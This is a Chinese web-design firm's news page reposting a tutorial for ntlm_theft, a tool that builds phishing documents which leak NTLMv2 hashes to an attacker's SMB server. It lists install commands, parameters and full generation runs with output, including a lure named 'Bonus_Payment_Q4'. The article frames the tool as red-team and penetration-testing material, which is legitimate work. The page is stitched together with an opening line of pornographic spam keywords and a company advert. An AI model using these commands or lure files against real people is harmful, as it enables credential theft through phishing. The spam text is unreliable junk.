日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關咨詢
選擇下列產(chǎn)品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
如何使用ntlm_theft生成各種類型的NTLMv2哈希竊取文件

關于ntlm_theft

ntlm_theft是一款基于Python 3開發(fā)的開源工具,可以生成21種不同類型的哈希竊取文檔。該工具適用于網(wǎng)絡釣魚攻擊,可以用于支持外網(wǎng)SMB流量和內(nèi)部網(wǎng)絡環(huán)境之中。與基于宏的文檔或利用漏洞的文檔相比,這些文件類型的好處在于,所有的這些文件都是使用“預期功能”構(gòu)建的。

創(chuàng)新互聯(lián)公司2013年成立,是專業(yè)互聯(lián)網(wǎng)技術服務公司,擁有項目成都網(wǎng)站制作、網(wǎng)站設計網(wǎng)站策劃,項目實施與項目整合能力。我們以讓每一個夢想脫穎而出為使命,1280元西青做網(wǎng)站,已為上家服務,為西青各地企業(yè)和個人服務,聯(lián)系電話:18982081108

使用場景

ntlm_theft主要針對滲透測試人員和紅隊研究人員設計,可以幫助研究人員對目標公司員工進行內(nèi)部網(wǎng)絡釣魚,或大規(guī)模測試防病毒和電子郵件網(wǎng)關的安全性。如果外網(wǎng)防火墻上允許出站SMB訪問,則它也可用于外部網(wǎng)絡釣魚。

工具依賴

ntlm_theft基于Python 3開發(fā),因此我們需要在本地環(huán)境安裝并配置好Python 3環(huán)境,并安裝好xlsxwriter:

 
 
 
    
  
  
  
  1. pip3 install xlsxwriter 
    2.

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

 
 
 
    
  
  
  
  1. git clone https://github.com/Greenwolf/ntlm_theft.git 
    2.

工具參數(shù)

ntlm_theft的運行需要提供四個必要參數(shù),一個輸入格式,輸入文件或目錄,以及基礎的運行模式:

  • -g, --generate : 選擇生成所有文件或指定文件類型
  • -s, --server : SMB哈希捕捉服務器的IP地址
  • -f, --filename : 不包含后綴的基礎文件名,之后可以進行重命名

工具運行

下面給出的工具演示樣例中,我們將使用ntlm_theft生成所有文件:

 
 
 
    
  
  
  
  1. # python3 ntlm_theft.py -g all -s 127.0.0.1 -f test 
    2.   
  
  
  2.  
    3.   
  
  
  3. Created: test/test.scf (BROWSE) 
    4.   
  
  
  4.  
    5.   
  
  
  5. Created: test/test-(url).url (BROWSE) 
    6.   
  
  
  6.  
    7.   
  
  
  7. Created: test/test-(icon).url (BROWSE) 
    8.   
  
  
  8.  
    9.   
  
  
  9. Created: test/test.rtf (OPEN) 
    10.   
  
  
  10.  
    11.   
  
  
  11. Created: test/test-(stylesheet).xml (OPEN) 
    12.   
  
  
  12.  
    13.   
  
  
  13. Created: test/test-(fulldocx).xml (OPEN) 
    14.   
  
  
  14.  
    15.   
  
  
  15. Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) 
    16.   
  
  
  16.  
    17.   
  
  
  17. Created: test/test-(includepicture).docx (OPEN) 
    18.   
  
  
  18.  
    19.   
  
  
  19. Created: test/test-(remotetempl*ate).docx (OPEN) 
    20.   
  
  
  20.  
    21.   
  
  
  21. Created: test/test-(frameset).docx (OPEN) 
    22.   
  
  
  22.  
    23.   
  
  
  23. Created: test/test.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY) 
    24.   
  
  
  24.  
    25.   
  
  
  25. Created: test/test.asx (OPEN) 
    26.   
  
  
  26.  
    27.   
  
  
  27. Created: test/test.jnlp (OPEN) 
    28.   
  
  
  28.  
    29.   
  
  
  29. Created: test/test.application (DOWNLOAD AND OPEN) 
    30.   
  
  
  30.  
    31.   
  
  
  31. Created: test/test.pdf (OPEN AND ALLOW) 
    32.   
  
  
  32.  
    33.   
  
  
  33. Created: test/zoom-attack-instructions.txt (PASTE TO CHAT) 
    34.   
  
  
  34.  
    35.   
  
  
  35. Generation Complete. 
    36.

在下面的工具使用樣例中,我們將使用ntlm_theft僅生成現(xiàn)代文件:

 
 
 
    
  
  
  
  1. # python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting 
    2.   
  
  
  2.  
    3.   
  
  
  3. Skipping SCF as it does not work on modern Windows 
    4.   
  
  
  4.  
    5.   
  
  
  5. Created: meeting/meeting-(url).url (BROWSE TO FOLDER) 
    6.   
  
  
  6.  
    7.   
  
  
  7. Created: meeting/meeting-(icon).url (BROWSE TO FOLDER) 
    8.   
  
  
  8.  
    9.   
  
  
  9. Created: meeting/meeting.rtf (OPEN) 
    10.   
  
  
  10.  
    11.   
  
  
  11. Created: meeting/meeting-(stylesheet).xml (OPEN) 
    12.   
  
  
  12.  
    13.   
  
  
  13. Created: meeting/meeting-(fulldocx).xml (OPEN) 
    14.   
  
  
  14.  
    15.   
  
  
  15. Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) 
    16.   
  
  
  16.  
    17.   
  
  
  17. Created: meeting/meeting-(includepicture).docx (OPEN) 
    18.   
  
  
  18.  
    19.   
  
  
  19. Created: meeting/meeting-(remotetempl*ate).docx (OPEN) 
    20.   
  
  
  20.  
    21.   
  
  
  21. Created: meeting/meeting-(frameset).docx (OPEN) 
    22.   
  
  
  22.  
    23.   
  
  
  23. Created: meeting/meeting-(externalcell).xlsx (OPEN) 
    24.   
  
  
  24.  
    25.   
  
  
  25. Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY) 
    26.   
  
  
  26.  
    27.   
  
  
  27. Created: meeting/meeting.asx (OPEN) 
    28.   
  
  
  28.  
    29.   
  
  
  29. Created: meeting/meeting.jnlp (OPEN) 
    30.   
  
  
  30.  
    31.   
  
  
  31. Created: meeting/meeting.application (DOWNLOAD AND OPEN) 
    32.   
  
  
  32.  
    33.   
  
  
  33. Created: meeting/meeting.pdf (OPEN AND ALLOW) 
    34.   
  
  
  34.  
    35.   
  
  
  35. Skipping zoom as it does not work on the latest versions 
    36.   
  
  
  36.  
    37.   
  
  
  37. Skipping Autorun.inf as it does not work on modern Windows 
    38.   
  
  
  38.  
    39.   
  
  
  39. Skipping desktop.ini as it does not work on modern Windows 
    40.   
  
  
  40.  
    41.   
  
  
  41. Generation Complete. 
    42.

在下面的工具使用樣例中,我們將使用ntlm_theft僅生成一份xlsx文件:

 
 
 
    
  
  
  
  1. # python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4 
    2.   
  
  
  2.  
    3.   
  
  
  3. Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN) 
    4.   
  
  
  4.  
    5.   
  
  
  5. Generation Complete. 
    6.

工具運行截圖

項目地址

ntlm_theft:【GitHub傳送門】


當前文章:如何使用ntlm_theft生成各種類型的NTLMv2哈希竊取文件
分享URL:http://www.dlmjj.cn/article/dpsiehp.html